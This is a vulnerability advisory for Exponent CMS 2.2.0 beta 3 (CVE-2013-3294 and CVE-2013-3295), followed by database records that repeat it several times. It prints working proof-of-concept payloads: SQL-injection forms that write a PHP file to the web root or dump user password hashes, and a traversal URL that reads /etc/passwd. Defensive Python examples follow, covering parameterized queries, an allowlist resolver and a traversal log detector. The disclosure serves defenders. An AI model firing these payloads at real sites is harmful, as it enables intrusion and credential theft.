Advisory ID: HTB23154
Product: Exponent CMS
Vendor: Online Innovative Creations
Vulnerable Version(s): 2.2.0 beta 3 and probably prior
Tested Version: 2.2.0 beta 3
Vendor Notification: April 24, 2013
Vendor Patch: May 3, 2013
Public Disclosure: May 15, 2013
Vulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98]
CVE References: CVE-2013-3294, CVE-2013-3295
Risk Level: High
CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Exponent CMS, which can be exploited to execute arbitrary SQL commands in the database of the vulnerable application and to execute arbitrary PHP code on the vulnerable system.
1) SQL Injection in Exponent CMS: CVE-2013-3294
The vulnerability exists due to insufficient filtration of the "src" and "username" HTTP GET parameters passed to the "/index.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in the application's database.
Depending on the database and system configuration, the PoC (Proof-of-Concept) code below will create a "/var/www/file.php" file containing a call to the PHP function 'phpinfo()':
<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="action" value="login">
<input type="hidden" name="int" value="1">
<input type="hidden" name="module" value="login">
<input type="hidden" name="password" value="password">
<input type="hidden" name="src" value="' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- ">
<input type="hidden" name="username" value="' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- ">
<input type="submit" id="btn">
</form>
The second PoC will attempt to create a "/var/www/file.txt" file containing the usernames and hashed passwords of all the application's users:
<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="action" value="login">
<input type="hidden" name="int" value="1">
<input type="hidden" name="module" value="login">
<input type="hidden" name="password" value="password">
<input type="hidden" name="src" value="' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- ">
<input type="hidden" name="username" value="' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- ">
<input type="submit" id="btn">
</form>
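The root cause described above is user input spliced directly into SQL text, so a `'` in the value ends the string literal and everything after it is parsed as SQL. The following example is added here and is not code from the advisory or from Exponent CMS; it contrasts the concatenation pattern with a parameterized query in an in-memory SQLite table. The table name `exponent_user` and the `username`/`password` columns are taken from the advisory's PoC; the rows, the placeholder hashes and the function names are constructed for illustration.

```python
"""
Added example (not part of advisory HTB23154 or of Exponent CMS):
a login lookup built by string concatenation, the pattern behind
CVE-2013-3294, next to the parameterized form that fixes it.
"""
import sqlite3

# Constructed sample rows; the "hashes" are placeholders, not real digests.
SAMPLE_USERS = [
    ("admin", "hash-of-admin-password"),
    ("editor", "hash-of-editor-password"),
]

# Same shape as the advisory's payload: close the literal, append a UNION,
# comment out the trailing quote. (INTO OUTFILE is deliberately omitted.)
INJECTED_USERNAME = "' UNION SELECT username, password FROM exponent_user -- "


def make_db() -> sqlite3.Connection:
    """Create an in-memory table with the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE exponent_user (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO exponent_user VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_concat(conn: sqlite3.Connection, username: str) -> list:
    """Vulnerable: untrusted input becomes part of the SQL text itself."""
    sql = ("SELECT username, password FROM exponent_user "
           "WHERE username = '%s'" % username)
    return conn.execute(sql).fetchall()


def lookup_param(conn: sqlite3.Connection, username: str) -> list:
    """Hardened: the driver binds the value; it can never be parsed as SQL."""
    sql = "SELECT username, password FROM exponent_user WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Concatenation returns every row for the injected value;
    # the parameterized query returns none, because no such user exists.
    print("concat :", lookup_concat(db, INJECTED_USERNAME))
    print("param  :", lookup_param(db, INJECTED_USERNAME))
    print("legit  :", lookup_param(db, "admin"))
```

Two points a defender should take from this. First, parameterization is the fix; escaping or filtering quotes is not, which is why the advisory calls the problem "insufficient filtration". Second, the advisory's "depending on database and system configuration" is about MySQL's `INTO OUTFILE`: it only works when the application's database account holds the FILE privilege and `secure_file_priv` permits the target directory, so running the CMS under a least-privilege database account limits an injection like this to data disclosure rather than file creation in the web root.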
2) PHP File Inclusion in Exponent CMS: CVE-2013-3295
The vulnerability is caused by improper filtration of user-supplied input passed via the "page" HTTP GET parameter to the "/install/popup.php" script, which is publicly accessible by default after the CMS is installed. A remote unauthenticated attacker can include arbitrary PHP files from the local system using directory traversal sequences together with a URL-encoded NULL byte, read arbitrary files, or execute arbitrary PHP code on the target system.
The PoC code below will output the content of the '/etc/passwd' file on a vulnerable system:
http://[host]/install/popup.php?page=../../../../etc/passwd%00
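The defect here is an include whose file name is taken from the request with no restriction on where it may point, and a NULL byte that truncates the path before any suffix the script appends. The example below is added here and is not code from the advisory or from Exponent CMS. It shows the two defensive checks a practitioner would want: an allowlist-based resolver for a "page"-style parameter, and a small detector that flags traversal and NULL-byte attempts in web-server access logs, both raw and URL-encoded. The allowed page names, the template directory and the log lines are constructed for illustration.

```python
"""
Added example (not part of advisory HTB23154 or of Exponent CMS):
allowlist resolution for an include-by-name parameter such as
install/popup.php?page=..., plus access-log detection of the
traversal + NULL-byte pattern used in CVE-2013-3295.
"""
import posixpath
import re
from typing import List, Optional
from urllib.parse import unquote

# Hypothetical: the only templates the popup script should ever include.
ALLOWED_PAGES = {"welcome", "license", "requirements"}
# Hypothetical base directory for those templates.
TEMPLATE_DIR = "/var/www/html/install/pages"


def resolve_page(page: str) -> Optional[str]:
    """Return the absolute file to include, or None to reject the request.

    Order matters: reject NULL bytes first (they truncate paths in older PHP),
    then require an exact allowlist match, then confirm the resolved path is
    still inside TEMPLATE_DIR as defense in depth.
    """
    if "\x00" in page:
        return None
    if page not in ALLOWED_PAGES:
        return None
    candidate = posixpath.normpath(posixpath.join(TEMPLATE_DIR, page + ".php"))
    if posixpath.commonpath([TEMPLATE_DIR, candidate]) != TEMPLATE_DIR:
        return None
    return candidate


# Traversal and NULL-byte markers, raw or percent-encoded (case-insensitive).
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\|%2e%2e|%00|\x00)", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+)')


def flag_request(log_line: str) -> bool:
    """True if the request target shows a traversal or NULL-byte attempt."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    target = m.group(1)
    # Check both the raw target and its decoded form so single encoding
    # does not slip past the pattern.
    return bool(TRAVERSAL_RE.search(target) or TRAVERSAL_RE.search(unquote(target)))


def suspicious_lines(lines: List[str]) -> List[str]:
    """Filter an access log down to the lines worth an analyst's attention."""
    return [line for line in lines if flag_request(line)]


# Constructed access-log lines in combined format; addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/May/2013:10:00:01 +0000] '
    '"GET /install/popup.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1842',
    '203.0.113.5 - - [15/May/2013:10:00:02 +0000] '
    '"GET /install/popup.php?page=%2E%2E%2F%2E%2E%2Fetc%2Fpasswd%00 HTTP/1.1" 200 1842',
    '198.51.100.7 - - [15/May/2013:10:00:03 +0000] '
    '"GET /install/popup.php?page=welcome HTTP/1.1" 200 512',
]


if __name__ == "__main__":
    for req in ("welcome", "../../../../etc/passwd\x00", "../../../../etc/passwd"):
        print(repr(req), "->", resolve_page(req))
    for line in suspicious_lines(SAMPLE_LOG):
        print("FLAGGED:", line)
```

The resolver never builds a path from the raw parameter at all; the parameter is only a key into a fixed set, which is the general fix for any include-by-name endpoint, not just this one. The advisory also notes that the installer directory remains reachable after installation by default, so removing or access-restricting `/install/` once setup is complete removes the exposed script regardless of the code fix.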
-----------------------------------------------------------------------------------------------
Solution:
Upgrade to Exponent CMS v2.2.0 Release Candidate 1
More Information:
http://www.exponentcms.org/news/release-candidate-1-v2-2-0-set-loose
http://forums.exponentcms.org/viewtopic.php?f=16&t=789
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23154 - https://www.htbridge.com/advisory/HTB23154 - Multiple Vulnerabilities in Exponent CMS.
[2] Exponent CMS - http://www.exponentcms.org - Exponent is a website content management system (or CMS) that allows site owners to easily create and manage dynamic websites without necessarily directly coding web pages, or managing site navigation.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
{"lastseen": "2020-04-01T19:04:14", "references": [], "description": "\nExponent CMS 2.2.0 Beta 3 - Multiple Vulnerabilities", "edition": 1, "reporter": "High-Tech Bridge SA", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2013-05-17T00:00:00", "title": "Exponent CMS 2.2.0 Beta 3 - Multiple Vulnerabilities", "type": "exploitpack", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-3294", "CVE-2013-3295"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803702"]}, {"type": "zdt", "idList": ["1337DAY-ID-20782"]}, {"type": "htbridge", "idList": ["HTB23154"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29587", "SECURITYVULNS:VULN:13172"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121643"]}, {"type": "exploitdb", "idList": ["EDB-ID:25518"]}], "modified": "2020-04-01T19:04:14", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2020-04-01T19:04:14", "rev": 2}, "vulnersScore": 7.3}, "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3294", "CVE-2013-3295"], "modified": "2013-05-17T00:00:00", "id": "EXPLOITPACK:B23C5B515DE6FC000428B56F15E6C52B", "href": "", "viewCount": 1, "sourceData": "Advisory ID: HTB23154\nProduct: Exponent CMS\nVendor: Online Innovative Creations\nVulnerable Version(s): 2.2.0 beta 3 and probably prior\nTested Version: 2.2.0 beta 3\nVendor Notification: April 24, 2013 \nVendor Patch: May 3, 2013 \nPublic Disclosure: May 15, 2013 \nVulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98]\nCVE References: CVE-2013-3294, CVE-2013-3295\nRisk Level: High \nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\nSolution Status: Fixed by Vendor\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n\n-----------------------------------------------------------------------------------------------\n\nAdvisory Details:\n\nHigh-Tech Bridge Security Research Lab 
discovered multiple vulnerabilities in Exponent CMS, which can be exploited to execute arbitrary SQL commands in the database of vulnerable application and execute arbitrary PHP code on the vulnerable system.\n\n\n1) SQL Injection in Exponent CMS: CVE-2013-3294\n\nThe vulnerability exists due to insufficient filtration of \"src\" and \"username\" HTTP GET parameters passed to \"/index.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\n\nDepending on database and system configuration, the PoC (Proof-of-Concept) code below will create a \"/var/www/file.php\" file with PHP function 'phpinfo()':\n\n\n<form action=\"http://[host]/index.php\" method=\"post\" name=\"main\">\n<input type=\"hidden\" name=\"action\" value=\"login\">\n<input type=\"hidden\" name=\"int\" value=\"1\">\n<input type=\"hidden\" name=\"module\" value=\"login\">\n<input type=\"hidden\" name=\"password\" value=\"password\">\n<input type=\"hidden\" name=\"src\" value=\"' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- \">\n<input type=\"hidden\" name=\"username\" value=\"' UNION SELECT '<? 
phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- \">\n<input type=\"submit\" id=\"btn\">\n</form>\n\n\nThe second PoC will attempt to create \"/var/www/file.txt\" file, containing usernames and hashed passwords of all application's users: \n\n\n<form action=\"http://[host]/index.php\" method=\"post\" name=\"main\">\n<input type=\"hidden\" name=\"action\" value=\"login\">\n<input type=\"hidden\" name=\"int\" value=\"1\">\n<input type=\"hidden\" name=\"module\" value=\"login\">\n<input type=\"hidden\" name=\"password\" value=\"password\">\n<input type=\"hidden\" name=\"src\" value=\"' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- \">\n<input type=\"hidden\" name=\"username\" value=\"' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- \">\n<input type=\"submit\" id=\"btn\">\n</form>\n\n\n\n2) PHP File Inclusion in Exponent CMS: CVE-2013-3295\n\nThe vulnerability is caused by improper filtration of user-supplied input passed via the \"page\" HTTP GET parameter to \"/install/popup.php\" script, which is publicly accessible after CMS installation by default. A remote unauthenticated attacker can include arbitrary PHP files from the local system using directory traversal sequences with URL-encoded NULL byte, read arbitrary files or execute arbitrary PHP code on the target system. 
\n\nThe PoC code below will output the content of '/etc/passwd' file on vulnerable system:\n\nhttp://[host]/install/popup.php?page=../../../../etc/passwd%00\n\n-----------------------------------------------------------------------------------------------\n\nSolution:\n\nUpgrade to Exponent CMS v2.2.0 Release Candidate 1\n\nMore Information:\nhttp://www.exponentcms.org/news/release-candidate-1-v2-2-0-set-loose\nhttp://forums.exponentcms.org/viewtopic.php?f=16&t=789\n\n-----------------------------------------------------------------------------------------------\n\nReferences:\n\n[1] High-Tech Bridge Advisory HTB23154 - https://www.htbridge.com/advisory/HTB23154 - Multiple Vulnerabilities in Exponent CMS.\n[2] Exponent CMS - http://www.exponentcms.org - Exponent is a website content management system (or CMS) that allows site owners to easily create and manage dynamic websites without necessarily directly coding web pages, or managing site navigation.\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n\n-----------------------------------------------------------------------------------------------\n\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "immutableFields": []}
{"cve": [{"lastseen": "2021-04-22T23:35:51", "description": "Directory traversal vulnerability in install/popup.php in Exponent CMS before 2.2.0 RC1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter.", "edition": 7, "cvss3": {}, "published": "2014-12-30T02:59:00", "title": "CVE-2013-3295", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-3295"], "modified": "2014-12-30T15:31:00", "cpe": ["cpe:/a:exponentcms:exponent_cms:2.2.0"], "id": "CVE-2013-3295", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3295", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:exponentcms:exponent_cms:2.2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-22T23:35:51", "description": "Multiple SQL injection vulnerabilities in Exponent CMS before 2.2.0 release candidate 1 allow remote attackers to execute arbitrary SQL commands via the (1) src or (2) username parameter to index.php.", "edition": 7, "cvss3": {}, "published": "2014-02-11T17:55:00", "title": "CVE-2013-3294", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-3294"], "modified": "2017-08-29T01:33:00", "cpe": ["cpe:/a:exponentcms:exponent_cms:2.1.2", "cpe:/a:exponentcms:exponent_cms:2.0.4", "cpe:/a:exponentcms:exponent_cms:2.0.9", "cpe:/a:exponentcms:exponent_cms:2.0.7", "cpe:/a:exponentcms:exponent_cms:2.0.6", "cpe:/a:exponentcms:exponent_cms:2.0.2", "cpe:/a:exponentcms:exponent_cms:2.1.4", "cpe:/a:exponentcms:exponent_cms:0.99.0", "cpe:/a:exponentcms:exponent_cms:2.1.3", "cpe:/a:exponentcms:exponent_cms:2.0.3", "cpe:/a:exponentcms:exponent_cms:2.0.5", "cpe:/a:exponentcms:exponent_cms:2.1.0", "cpe:/a:exponentcms:exponent_cms:2.2.0", "cpe:/a:exponentcms:exponent_cms:2.0.1", "cpe:/a:exponentcms:exponent_cms:0.97.0", "cpe:/a:exponentcms:exponent_cms:2.1.1", "cpe:/a:exponentcms:exponent_cms:0.98.0", "cpe:/a:exponentcms:exponent_cms:2.0.0", "cpe:/a:exponentcms:exponent_cms:2.0.8"], "id": "CVE-2013-3294", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3294", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:exponentcms:exponent_cms:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:0.98.0:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:0.97.0:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.0.8:*:*:*:*:*:*:*", 
"cpe:2.3:a:exponentcms:exponent_cms:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:0.99.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:exponentcms:exponent_cms:2.0.0:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-02-10T11:32:36", "edition": 2, "description": "Exponent CMS version 2.2.0 beta 3 suffers from local file inclusion and remote SQL injection vulnerabilities.", "published": "2013-05-16T00:00:00", "type": "zdt", "title": "Exponent CMS 2.2.0 Beta 3 LFI / SQL Injection Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3294", "CVE-2013-3295"], "modified": "2013-05-16T00:00:00", "id": "1337DAY-ID-20782", "href": "https://0day.today/exploit/description/20782", "sourceData": "Product: Exponent CMS\r\nVendor: Online Innovative Creations\r\nVulnerable Version(s): 2.2.0 beta 3 and probably prior\r\nTested Version: 2.2.0 beta 3\r\nVendor Notification: April 24, 2013 \r\nVendor Patch: May 3, 2013 \r\nPublic Disclosure: May 15, 2013 \r\nVulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98]\r\nCVE References: CVE-2013-3294, CVE-2013-3295\r\nRisk Level: High \r\nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Exponent CMS, which can be exploited to execute arbitrary SQL commands in the database of vulnerable application and execute arbitrary PHP code on the vulnerable system.\r\n\r\n\r\n1) SQL Injection in Exponent CMS: CVE-2013-3294\r\n\r\nThe vulnerability exists due to insufficient filtration of \"src\" and \"username\" HTTP GET 
parameters passed to \"/index.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nDepending on database and system configuration, the PoC (Proof-of-Concept) code below will create a \"/var/www/file.php\" file with PHP function 'phpinfo()':\r\n\r\n\r\n<form action=\"http://[host]/index.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"action\" value=\"login\">\r\n<input type=\"hidden\" name=\"int\" value=\"1\">\r\n<input type=\"hidden\" name=\"module\" value=\"login\">\r\n<input type=\"hidden\" name=\"password\" value=\"password\">\r\n<input type=\"hidden\" name=\"src\" value=\"' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- \">\r\n<input type=\"hidden\" name=\"username\" value=\"' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\nThe second PoC will attempt to create \"/var/www/file.txt\" file, containing usernames and hashed passwords of all application's users: \r\n\r\n\r\n<form action=\"http://[host]/index.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"action\" value=\"login\">\r\n<input type=\"hidden\" name=\"int\" value=\"1\">\r\n<input type=\"hidden\" name=\"module\" value=\"login\">\r\n<input type=\"hidden\" name=\"password\" value=\"password\">\r\n<input type=\"hidden\" name=\"src\" value=\"' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- \">\r\n<input type=\"hidden\" name=\"username\" value=\"' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\n\r\n2) PHP File Inclusion in Exponent CMS: CVE-2013-3295\r\n\r\nThe vulnerability is caused by improper filtration of user-supplied input passed via the \"page\" HTTP GET parameter to \"/install/popup.php\" script, which is publicly 
accessible after CMS installation by default. A remote unauthenticated attacker can include arbitrary PHP files from the local system using directory traversal sequences with URL-encoded NULL byte, read arbitrary files or execute arbitrary PHP code on the target system. \r\n\r\nThe PoC code below will output the content of '/etc/passwd' file on vulnerable system:\r\n\r\nhttp://[host]/install/popup.php?page=../../../../etc/passwd%00\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to Exponent CMS v2.2.0 Release Candidate 1\r\n\r\nMore Information:\r\nhttp://www.exponentcms.org/news/release-candidate-1-v2-2-0-set-loose\r\nhttp://forums.exponentcms.org/viewtopic.php?f=16&t=789\n\n# 0day.today [2018-02-10] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/20782"}], "packetstorm": [{"lastseen": "2016-12-05T22:15:40", "description": "", "published": "2013-05-15T00:00:00", "type": "packetstorm", "title": "Exponent CMS 2.2.0 Beta 3 LFI / SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3294", "CVE-2013-3295"], "modified": "2013-05-15T00:00:00", "id": "PACKETSTORM:121643", "href": "https://packetstormsecurity.com/files/121643/Exponent-CMS-2.2.0-Beta-3-LFI-SQL-Injection.html", "sourceData": "`Advisory ID: HTB23154 \nProduct: Exponent CMS \nVendor: Online Innovative Creations \nVulnerable Version(s): 2.2.0 beta 3 and probably prior \nTested Version: 2.2.0 beta 3 \nVendor Notification: April 24, 2013 \nVendor Patch: May 3, 2013 \nPublic Disclosure: May 15, 2013 \nVulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98] \nCVE References: CVE-2013-3294, CVE-2013-3295 \nRisk Level: High \nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Exponent CMS, which can be exploited to execute arbitrary SQL commands in the database of vulnerable application and execute arbitrary PHP code on the vulnerable system. \n \n \n1) SQL Injection in Exponent CMS: CVE-2013-3294 \n \nThe vulnerability exists due to insufficient filtration of \"src\" and \"username\" HTTP GET parameters passed to \"/index.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. \n \nDepending on database and system configuration, the PoC (Proof-of-Concept) code below will create a \"/var/www/file.php\" file with PHP function 'phpinfo()': \n \n \n<form action=\"http://[host]/index.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"action\" value=\"login\"> \n<input type=\"hidden\" name=\"int\" value=\"1\"> \n<input type=\"hidden\" name=\"module\" value=\"login\"> \n<input type=\"hidden\" name=\"password\" value=\"password\"> \n<input type=\"hidden\" name=\"src\" value=\"' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- \"> \n<input type=\"hidden\" name=\"username\" value=\"' UNION SELECT '<? 
phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \nThe second PoC will attempt to create \"/var/www/file.txt\" file, containing usernames and hashed passwords of all application's users: \n \n \n<form action=\"http://[host]/index.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"action\" value=\"login\"> \n<input type=\"hidden\" name=\"int\" value=\"1\"> \n<input type=\"hidden\" name=\"module\" value=\"login\"> \n<input type=\"hidden\" name=\"password\" value=\"password\"> \n<input type=\"hidden\" name=\"src\" value=\"' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- \"> \n<input type=\"hidden\" name=\"username\" value=\"' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n \n2) PHP File Inclusion in Exponent CMS: CVE-2013-3295 \n \nThe vulnerability is caused by improper filtration of user-supplied input passed via the \"page\" HTTP GET parameter to \"/install/popup.php\" script, which is publicly accessible after CMS installation by default. A remote unauthenticated attacker can include arbitrary PHP files from the local system using directory traversal sequences with URL-encoded NULL byte, read arbitrary files or execute arbitrary PHP code on the target system. 
\n \nThe PoC code below will output the content of '/etc/passwd' file on vulnerable system: \n \nhttp://[host]/install/popup.php?page=../../../../etc/passwd%00 \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpgrade to Exponent CMS v2.2.0 Release Candidate 1 \n \nMore Information: \nhttp://www.exponentcms.org/news/release-candidate-1-v2-2-0-set-loose \nhttp://forums.exponentcms.org/viewtopic.php?f=16&t=789 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23154 - https://www.htbridge.com/advisory/HTB23154 - Multiple Vulnerabilities in Exponent CMS. \n[2] Exponent CMS - http://www.exponentcms.org - Exponent is a website content management system (or CMS) that allows site owners to easily create and manage dynamic websites without necessarily directly coding web pages, or managing site navigation. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. 
